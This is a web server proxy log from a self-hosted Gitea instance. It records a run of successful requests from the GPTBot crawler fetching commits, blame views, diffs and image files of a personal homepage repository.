"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:14:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23047] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2frequirements.txt" [Client 74.7.227.38] [Length 19533] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" -[17/Feb/2026:14:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fDOCKER_GUIDE.md" [Client 74.7.227.38] [Length 31297] [Gzip 9.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" -[17/Feb/2026:14:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11933] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" -[17/Feb/2026:14:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fjs%2fi18n.js" [Client 74.7.227.38] [Length 22440] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" -[17/Feb/2026:14:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 31501] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" -[17/Feb/2026:14:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 24645] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" -[17/Feb/2026:14:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fassets%2fimages%2ffavicon.ico" [Client 74.7.227.38] [Length 19127] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" -[17/Feb/2026:14:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 9822] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" -[17/Feb/2026:14:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11880] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:14:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11296] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:14:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10518] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" [Client 74.7.227.38] [Length 11174] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" -[17/Feb/2026:14:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" -[17/Feb/2026:14:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" -[17/Feb/2026:14:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11206] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" -[17/Feb/2026:14:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" -[17/Feb/2026:14:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 288111] [Gzip 12.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main" -[17/Feb/2026:14:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 288849] [Gzip 12.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main" -[17/Feb/2026:14:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 316833] [Gzip 14.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" -[17/Feb/2026:14:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10381] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" -[17/Feb/2026:14:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" -[17/Feb/2026:14:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 10891] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:14:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10112] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:14:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11208] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" -[17/Feb/2026:14:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10897] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:14:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:14:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:14:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 10902] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:14:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10876] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:14:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:14:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:14:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:14:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 1094909] [Gzip 12.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" -[17/Feb/2026:14:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" -[17/Feb/2026:14:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:14:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 1642848] [Gzip 11.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" -[17/Feb/2026:14:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" -[17/Feb/2026:14:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" -[17/Feb/2026:14:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 4275170] [Gzip 11.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" -[17/Feb/2026:14:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" -[17/Feb/2026:14:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 7269881] [Gzip 12.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" -[17/Feb/2026:14:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692379] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641829] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508484] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699423] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498858] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:34:15 +0000] - 